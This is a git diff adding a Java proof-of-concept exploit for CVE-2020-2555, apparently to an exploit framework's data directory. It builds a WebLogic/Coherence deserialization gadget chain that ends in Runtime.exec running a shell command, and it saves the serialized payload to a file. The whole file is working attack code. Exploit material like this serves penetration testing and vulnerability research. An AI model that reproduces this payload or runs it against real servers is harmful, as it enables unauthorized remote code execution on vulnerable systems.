diff --git a/data/exploits/CVE-2020-2555/Weblogic_2555.java b/data/exploits/CVE-2020-2555/Weblogic_2555.java
new file mode 100644
index 0000000000..e4099349b6
--- /dev/null
+++ b/data/exploits/CVE-2020-2555/Weblogic_2555.java
@@ -0,0 +1,54 @@
+import com.tangosol.util.filter.LimitFilter;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+import javax.management.BadAttributeValueExpException;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+
+/*
+ *  BadAttributeValueExpException.readObject()
+ *  com.tangosol.util.filter.LimitFilter.toString()
+ *  com.tangosol.util.extractor.ChainedExtractor.extract()
+ *  com.tangosol.util.extractor.ReflectionExtractor.extract()
+ *  Method.invoke()
+ *  Runtime.exec()
+ *
+ *  PoC by Y4er
+ */
+public class Weblogic_2555
+{
+	public static void main(String args[]) throws Exception
+	{
+		ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
+		ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
+		ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
+
+		ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
+		ChainedExtractor chainedExt = new ChainedExtractor(extractors);
+		LimitFilter limitFilter = new LimitFilter();
+
+		Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
+		m_comparator.setAccessible(true);
+		m_comparator.set(limitFilter, chainedExt);
+
+		Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
+		m_oAnchorTop.setAccessible(true);
+		m_oAnchorTop.set(limitFilter, Runtime.class);
+
+		BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
+		Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
+		field.setAccessible(true);
+		field.set(badAttributeValueExpException, limitFilter);
+
+		// Serialize object & save to file
+		FileOutputStream fos = new FileOutputStream("payload_obj.ser");
+		ObjectOutputStream os = new ObjectOutputStream(fos);
+		os.writeObject(badAttributeValueExpException);
+		os.close();
+
+	}
+}